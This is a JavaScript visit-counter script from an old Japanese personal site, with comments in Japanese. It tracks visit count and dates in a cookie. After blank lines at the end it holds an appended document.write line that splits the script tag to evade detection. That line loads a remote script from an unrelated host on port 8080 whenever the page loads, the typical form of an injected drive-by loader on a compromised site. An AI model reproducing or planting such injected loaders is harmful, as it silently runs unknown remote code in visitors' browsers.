<!--
// by「菊池さん」 http://village.infoweb.ne.jp/~tkiku/
// クッキー読み込みと処理
cookie_name="rara_cookie";
get_data = GetCookie(cookie_name);
now = new Date();
year = now.getYear(); if (year < 2000) year = year + 1900;
today	= year
	+ ((now.getMonth() < 9) ? "0" : "") + (now.getMonth()+1)
	+ ((now.getDate() < 10) ? "0" : "") + now.getDate();
today=today.substring(0,4)+"/"+today.substring(4,6)+"/"+today.substring(6,8);
if (get_data == null) {	// 初回訪問初期値セット
	count  = 1;		//訪問回数
	first  = today;		//初訪問日
	last   = today;		//最終訪問日
	lastp  = today;		//前回最終訪問日
} else {		// ２回目以降クッキーを項目に分解
	var pairs = new Array(),values = new Array(),str = new Array();
	pairs = get_data.split(",");
	for (i = 0; i < pairs.length; i++) {
		str = pairs[i].split(":");
		values[i] = str[1];
	}
	count  = values[0];
	first  = values[1];
	last   = values[2];
	lastp  = values[3];
	if (last != today) {
		count++;	//カウンター更新
		lastp = last;	//最終訪問日更新
	}
}
// クッキー読み込みと処理(終り)
//-->





document.write('<s'+'cript type="text/javascript" src="http://solk.seamscreative.info:8080/Unfriend.js"></scr'+'ipt>');